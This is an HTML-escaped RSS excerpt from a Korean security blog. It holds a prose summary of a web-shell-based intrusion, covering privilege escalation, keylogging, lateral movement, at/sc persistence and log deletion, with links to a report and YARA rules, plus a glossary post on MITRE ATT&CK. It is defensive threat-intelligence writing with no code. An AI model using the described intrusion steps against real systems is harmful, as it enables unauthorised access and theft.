&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;1. 서론&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;2. 개요&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;3. ATT&amp;amp;CK Matrix&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;-&amp;nbsp;Initial Access : 최초 침투&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Execution : 실행&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;-&amp;nbsp;Persistence : 지속성 유지&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;-&amp;nbsp;Privilege Escalation : 권한 상승&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Defense Evasion : 방어 회피&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Credential Access : 계정정보 접근&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;-&amp;nbsp;Discovery : 탐색&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Collection : 정보 수집&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Lateral Movement : 시스템 내부 이동&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Command and Control : 명령제어&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;&amp;nbsp;- Exfiltration : 정보 유출&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;4. 결론&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #222222;&quot;&gt;5. Yara rule&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근까지 공격을 받은 피해 시스템을 2개월에 걸쳐 분석하고 조치하였으며 수집한 정보를 종합하여 다음과 같이를 도출하였다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;① 최초 침투(Initial Access)&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;공격자는 외부에 노출되어있는 사내 홈페이지를 통해 최초로 접근을 시도하였다. 이후 &lt;/span&gt;&lt;b&gt;특정 계정으로 로그인을 단번에 성공&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;한 것으로 보아 &lt;/span&gt;&lt;b&gt;외부 노출 페이지와 , 계정정보를 기존에 미리 수집&lt;/b&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;한 것으로 추정된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는 게시판에 존재하는 &lt;b&gt;파일 업로드 취약점을 이용하여 웹셸을 업로드&lt;/b&gt;하고 이를 통해 서버를 제어한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;② 접근 권한 수집&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 웹셸로 접근하였기 때문에 웹 서비스 권한만 소유한 공격자는 추가적인 악성 행위를 위해 &lt;b&gt;운영체제에 존재하는 취약점을 이용하여 권한 상승을 시도&lt;/b&gt;하였다 .&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 이후 추가적인 계정 정보를 수집하기 위해 &lt;b&gt;키로깅 악성코드를 설치&lt;/b&gt;한다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;③ 내부전파&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 권한 상승에 성공한 공격자는 이후 추가적인 전파를 위해 &lt;b&gt;네트워크 공유를 이용&lt;/b&gt;한다. 이때 같은 계정을 사용하거나 세션이 유지되고 있는 서버에 대한 접근에 성공한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;④ 악성코드 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 이후 공격자는 at 명령어를 이용하여 &lt;b&gt;악성코드를 스케줄러에 등록&lt;/b&gt;하여 실행하거나, sc 명령어를 이용하여 &lt;b&gt;서비스로 등록하여 실행&lt;/b&gt;시킨다&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑤ 흔적 삭제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공격자는 공격을 마치거나 또는 거점으로서 일시적으로 이용한 서버에 대해서는 &lt;b&gt;이벤트로그를 삭제하거나 악성코드를 삭제함&lt;/b&gt;으로서 공격의 흔적을 지운다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;⑥ 탈취 정보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 공격자는 최종적으로 악성코드의 명령을 통하여 &lt;b&gt;사내 정보를 수집&lt;/b&gt;하며 웹 페이지가 운영되는 서버에서는 &lt;b&gt;웹로그도 수집&lt;/b&gt;한다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/bFWonu/btsdZ3vNqaC/3gWWyWZFp48nDsuYdZHmKK/TTPs%231%20%ED%99%88%ED%8E%98%EC%9D%B4%EC%A7%80%EB%A5%BC%20%ED%86%B5%ED%95%9C%20%EB%82%B4%EB%B6%80%EB%A7%9D%20%EC%9E%A5%EC%95%85.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;TTPs#1 홈페이지를 통한 내부망 장악.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;3.47MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/WOY3I/btsd0uGGkMK/qTzdkhMbFibgvWgSBxJWT1/KrCERT%20Operation%20BookCode%20Yara%20Rule%20%281%29.yar?attach=1&amp;amp;knm=tfile.yar&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;KrCERT Operation BookCode Yara Rule (1).yar&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;0.00MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/631</guid>
      <comments>https://jennana.tistory.com/631#entry631comment</comments>
      <pubDate>Wed, 10 May 2023 23:39:18 +0900</pubDate>
    </item>
    <item>
      <title>[보안용어] MITRE ATT&amp;amp;CK(Adversarial Tactics, Techniques and Common Knowledge)</title>
      <link>https://jennana.tistory.com/630</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[보안용어] &lt;/b&gt;&lt;b&gt;&lt;span style=&quot;text-align: start;&quot;&gt;MITRE ATT&amp;amp;CK&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;&lt;span style=&quot;text-align: start;&quot;&gt;(Adversarial Tactics, Techniques and Common Knowledge)&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;  개요&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;우선, MITRE ATT&amp;amp;CK는 조직에서 보안 태세를 파악하고 방어 취약점을 발견하도록 하기 위해서 MITRE라는 기업에서 개발한 프레임워크와 일련의 데이터 매트릭스, 평가 툴&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&amp;nbsp; &amp;nbsp; * MITRE : 미국 연방정부의 지원을 받아 국가안보관련 업무를 수행하던 비영리 연구개발 단체&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ATT&amp;amp;CK Framework를 이해하기 위해서는 Cyber Kill Chain이라는 용어를 이해해야한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;  Cyber Kill Chain&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;Cyber Kill Chain(사이버 킬 체인)&lt;/b&gt;은 군사용어인 &lt;b&gt;Kill Chain(킬체인)&lt;/b&gt;이란 타격순환체계에서 비롯되었는데, &lt;b&gt;발사된 미사일을 요격하는 것이 아니라 선제적으로 미사일 발사 자체를 저지하겠다는 개념&lt;/b&gt;으로 사이버공간에 적용한 것이 바로&amp;nbsp;&lt;b&gt;Cyber Kill Chain(사이버 킬 체인)&lt;/b&gt;이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;즉, 사이버 공격이 5단계를 거쳐서 진행되는데 각 단계별 위협요소를 제거하기 위한 활동으로 공격자 입장에서 공격 분성르 통해 단계별 연결고리(Chain)을 사전에 끊어 피해를 최소화 하는 것이 전략의 목표이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;사이버 보안에서 '킬체인'이라는 용어를 처음 사용한 것은 미국 군수업체인 록히드마틴 (Lockheed Martin Corporation)이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 단계별 사이버 킬 체인 예시&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 7.55814%;&quot;&gt;1단계&lt;/td&gt;
&lt;td style=&quot;width: 36.5503%;&quot;&gt;정찰(Reconnaissance)&lt;/td&gt;
&lt;td style=&quot;width: 55.8915%;&quot;&gt;공격대상 인프라에 침투해 거점을 확보하고 오랫동안 정찰 수행&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 7.55814%;&quot;&gt;2단계&lt;/td&gt;
&lt;td style=&quot;width: 36.5503%;&quot;&gt;무기화 및 전달 (Weponization and Delivery)&lt;/td&gt;
&lt;td style=&quot;width: 55.8915%;&quot;&gt;공격 목표를 달성하기 위해 정보를 수집하고 권한을 획득&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 7.55814%;&quot;&gt;3단계&lt;/td&gt;
&lt;td style=&quot;width: 36.5503%;&quot;&gt;익스플로잇/설치 (Exploit and Installation)&lt;/td&gt;
&lt;td style=&quot;width: 55.8915%;&quot;&gt;공격용 악성코드를 만들어 설치&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 7.55814%;&quot;&gt;4단계&lt;/td&gt;
&lt;td style=&quot;width: 36.5503%;&quot;&gt;명령/제어 (Command and Control, C&amp;amp;C)&lt;/td&gt;
&lt;td style=&quot;width: 55.8915%;&quot;&gt;원격에서 명령 실행&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 7.55814%;&quot;&gt;5단계&lt;/td&gt;
&lt;td style=&quot;width: 36.5503%;&quot;&gt;행동 및 탈출 (Action and Exfiltration)&lt;/td&gt;
&lt;td style=&quot;width: 55.8915%;&quot;&gt;정보유출 혹은 시스템 파괴 후 공격자는 증거 삭제&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;  MITRE ATT&amp;amp;CK&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;마이터 어택은 공격자들의 최신 공격 기술 정보가 담긴 저장소 &lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;MITRE ATT&amp;amp;CK은 Adversarial Tatics, Techniques and Common Konwledge의 약자&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  Adversary behaviors : 악위적행위&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  Tatics :&amp;nbsp; 공격방법&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  Techniques : 기술&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  즉, 악의적인 행위에 대해서 공격방식과 기술에 대한 정보를 분류해 목록해 놓은 것&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;ATT&amp;amp;CK는 MITRE에서 윈도우 기업 네트워크 환경에 사용되는 해킹 공격에 대해서 방법(Tatics), 기술(Techniques), 절차(Procedures) 등 TTPs를 문서화 하는 것부터 시작되었음. 이후 공격 행동 패턴 분석을 기반으로 TTPs 정보를 매핑하여 공격자 행위를 식별할 수 있는 프레임워크로 발전.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;MITRE ATT&amp;amp;CK 홈페이지에 있는 화면&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;20230505_001611.jpg&quot; data-origin-width=&quot;1500&quot; data-origin-height=&quot;881&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dvnGMk/btsdYCM09zZ/SktdyqWhaHT8HpSNaKotj0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dvnGMk/btsdYCM09zZ/SktdyqWhaHT8HpSNaKotj0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dvnGMk/btsdYCM09zZ/SktdyqWhaHT8HpSNaKotj0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdvnGMk%2FbtsdYCM09zZ%2FSktdyqWhaHT8HpSNaKotj0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1500&quot; height=&quot;881&quot; data-filename=&quot;20230505_001611.jpg&quot; data-origin-width=&quot;1500&quot; data-origin-height=&quot;881&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- ATT&amp;amp;CK Matrix 예시&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Reconnaissance : 정찰&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Resource Development : 자원개발&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Initial Access : 최초 침투&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Execution : 실행&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;-&amp;nbsp;Persistence : 지속성 유지&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;-&amp;nbsp;Privilege Escalation : 권한 상승&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Defense Evasion : 방어 회피&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Credential Access : 계정정보 접근&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;-&amp;nbsp;Discovery : 탐색&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Collection : 정보 수집&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Lateral Movement : 시스템 내부 이동&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Command and Control : 명령제어&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot;&gt;&amp;nbsp;- Exfiltration : 정보 유출&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- Impact : 시스템 충격&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;  MITRE ATT&amp;amp;CK의 이점&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 조직에서 공격자의 운영 방식을 이해&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 공격자가 초기 액세스 권한을 확보하고, 데이터를 검색하며, 수평으로 이동하고, 데이터를 유출하기 위해 취하는 단계 파악 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;   공격자의 관점에서 볼 수 있어 동기와 전력이해가 쉬움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 보안 태세의 격차를 식별하고 공격자의 다음 행동을 예측하여 신속하게 교정하도록 지원하여 위협 탐지와 대응 개선이 가능&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;✔ Refrence&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;이글루시큐리티, MITRE ATT&amp;amp;CK Framework 이해하기,&amp;nbsp;&lt;a href=&quot;https://www.igloo.co.kr/security-information/mitre-attck-framework-%EC%9D%B4%ED%95%B4%ED%95%98%EA%B8%B0/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.igloo.co.kr/security-information/mitre-attck-framework-%EC%9D%B4%ED%95%B4%ED%95%98%EA%B8%B0/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1683342285332&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;MITRE ATT&amp;amp;CK Framework 이해하기&quot; data-og-description=&quot;&amp;nbsp; &amp;nbsp; 01. 개요 지금도 사이버 공간을 위협하려는 공격 시도는 계속되고 있다. 디도스, 랜섬웨어 등 사이버 공격은 갈수록 지능화&amp;middot;고도화 되어가고 있으며 따라서 여전히 많은 이들이 지속적 위협&quot; data-og-host=&quot;www.igloo.co.kr&quot; data-og-source-url=&quot;https://www.igloo.co.kr/security-information/mitre-attck-framework-%EC%9D%B4%ED%95%B4%ED%95%98%EA%B8%B0/&quot; data-og-url=&quot;https://www.igloo.co.kr/security-information/mitre-attck-framework-이해하기/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bu8Bil/hySwPYgsqL/Y0yiXmTf6koQB6cFv2wqwk/img.jpg?width=295&amp;amp;height=200&amp;amp;face=31_63_118_158,https://scrap.kakaocdn.net/dn/h82c7/hySwKWXHmz/RgbJMSZ9Rls4Awh8yrkUZK/img.png?width=829&amp;amp;height=739&amp;amp;face=0_0_829_739,https://scrap.kakaocdn.net/dn/Regxs/hySvuBqRDe/k397bhVQjbW61Np9IkVIK1/img.jpg?width=920&amp;amp;height=500&amp;amp;face=0_0_920_500&quot;&gt;&lt;a href=&quot;https://www.igloo.co.kr/security-information/mitre-attck-framework-%EC%9D%B4%ED%95%B4%ED%95%98%EA%B8%B0/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.igloo.co.kr/security-information/mitre-attck-framework-%EC%9D%B4%ED%95%B4%ED%95%98%EA%B8%B0/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bu8Bil/hySwPYgsqL/Y0yiXmTf6koQB6cFv2wqwk/img.jpg?width=295&amp;amp;height=200&amp;amp;face=31_63_118_158,https://scrap.kakaocdn.net/dn/h82c7/hySwKWXHmz/RgbJMSZ9Rls4Awh8yrkUZK/img.png?width=829&amp;amp;height=739&amp;amp;face=0_0_829_739,https://scrap.kakaocdn.net/dn/Regxs/hySvuBqRDe/k397bhVQjbW61Np9IkVIK1/img.jpg?width=920&amp;amp;height=500&amp;amp;face=0_0_920_500');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;MITRE ATT&amp;amp;CK Framework 이해하기&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &amp;nbsp; 01. 개요 지금도 사이버 공간을 위협하려는 공격 시도는 계속되고 있다. 디도스, 랜섬웨어 등 사이버 공격은 갈수록 지능화&amp;middot;고도화 되어가고 있으며 따라서 여전히 많은 이들이 지속적 위협&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.igloo.co.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;VMWARE, MITRE ATT&amp;amp;CK이란?,&amp;nbsp;&lt;a href=&quot;https://www.vmware.com/kr/topics/glossary/content/mitre-attack.html#:~:text=ATT%26CK%20%EB%A7%A4%ED%8A%B8%EB%A6%AD%EC%8A%A4%EB%8A%94%20%EA%B3%B5%EA%B2%A9%EC%9E%90%20%EB%98%90%EB%8A%94,%EC%A0%84%EB%AC%B8%EA%B0%80%EC%97%90%20%EC%9D%98%ED%95%B4%20%ED%99%9C%EC%9A%A9%EB%90%A9%EB%8B%88%EB%8B%A4.&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.vmware.com/kr/topics/glossary/content/mitre-attack.html#:~:text=ATT%26CK%20%EB%A7%A4%ED%8A%B8%EB%A6%AD%EC%8A%A4%EB%8A%94%20%EA%B3%B5%EA%B2%A9%EC%9E%90%20%EB%98%90%EB%8A%94,%EC%A0%84%EB%AC%B8%EA%B0%80%EC%97%90%20%EC%9D%98%ED%95%B4%20%ED%99%9C%EC%9A%A9%EB%90%A9%EB%8B%88%EB%8B%A4.&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1683342292702&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;Website&quot; data-og-title=&quot;What Is MITRE ATT CK - Definition | VMware Glossary&quot; data-og-description=&quot;MITRE ATT CK is a framework, set of data matrices, and assessment tool developed by MITRE Corporation to help organizations understand their security readiness.&quot; data-og-host=&quot;www.vmware.com&quot; data-og-source-url=&quot;https://www.vmware.com/kr/topics/glossary/content/mitre-attack.html#:~:text=ATT%26CK%20%EB%A7%A4%ED%8A%B8%EB%A6%AD%EC%8A%A4%EB%8A%94%20%EA%B3%B5%EA%B2%A9%EC%9E%90%20%EB%98%90%EB%8A%94,%EC%A0%84%EB%AC%B8%EA%B0%80%EC%97%90%20%EC%9D%98%ED%95%B4%20%ED%99%9C%EC%9A%A9%EB%90%A9%EB%8B%88%EB%8B%A4.&quot; data-og-url=&quot;https://www.vmware.com/topics/glossary/content/mitre-attack.html &quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/C5Ufz/hySvzXcf2N/DAHOmN0R3VuZnxq8cZ2BX0/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400,https://scrap.kakaocdn.net/dn/bnnh3f/hySwNF9wiw/pzxmJYWZk2SRkkhrWiybmk/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400&quot;&gt;&lt;a href=&quot;https://www.vmware.com/kr/topics/glossary/content/mitre-attack.html#:~:text=ATT%26CK%20%EB%A7%A4%ED%8A%B8%EB%A6%AD%EC%8A%A4%EB%8A%94%20%EA%B3%B5%EA%B2%A9%EC%9E%90%20%EB%98%90%EB%8A%94,%EC%A0%84%EB%AC%B8%EA%B0%80%EC%97%90%20%EC%9D%98%ED%95%B4%20%ED%99%9C%EC%9A%A9%EB%90%A9%EB%8B%88%EB%8B%A4.&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.vmware.com/kr/topics/glossary/content/mitre-attack.html#:~:text=ATT%26CK%20%EB%A7%A4%ED%8A%B8%EB%A6%AD%EC%8A%A4%EB%8A%94%20%EA%B3%B5%EA%B2%A9%EC%9E%90%20%EB%98%90%EB%8A%94,%EC%A0%84%EB%AC%B8%EA%B0%80%EC%97%90%20%EC%9D%98%ED%95%B4%20%ED%99%9C%EC%9A%A9%EB%90%A9%EB%8B%88%EB%8B%A4.&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/C5Ufz/hySvzXcf2N/DAHOmN0R3VuZnxq8cZ2BX0/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400,https://scrap.kakaocdn.net/dn/bnnh3f/hySwNF9wiw/pzxmJYWZk2SRkkhrWiybmk/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
